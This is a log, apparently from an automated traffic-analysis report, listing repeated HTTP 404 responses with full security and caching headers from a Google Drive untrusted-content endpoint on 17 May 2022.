                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:06 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-DbejINwPymBJli+gJnu1yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:06 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-F+6k4TRLT8BEATbJgxtGaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:06 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4cIyGwT/r9Ihuin+ycFoxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:06 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VGHoWNTpIvAJEv7izt47GQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:06 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-OpAjeeIkALq3J6GMdYpFtg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:06 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-mpXSzzs5QMjUDVaOo2nTNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:06 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4xwjgAPD4QSd4HCHvCuqOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:06 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VnWejGAfP6C0GW4Eb7GLPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:07 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-d+MJO/LyIah4OBGN2Tx53Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:07 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-3ChlxztYlFXtEetX1QhjjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:07 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-FJHlVQWaDrTAEDMXyt7GMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:07 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-24703PNcIVtd2by33RD1Eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:07 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-kbVZhEupb/PxC6pV0ifRPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:07 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-N8+BCspVsTB6gf5InbneSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:07 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-fD9ebm00IehM/Gi2NIl9hA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:08 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: script-src 'report-sample' 'nonce-IRVHXWyRbwHMHmmg+CNNXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:08 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ev4tjjODezkm1A/chIyJag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:08 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-0nwInk+c14+vVNRMzNqnzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:08 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-NqjkWRVe00j1bdHEavgyZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
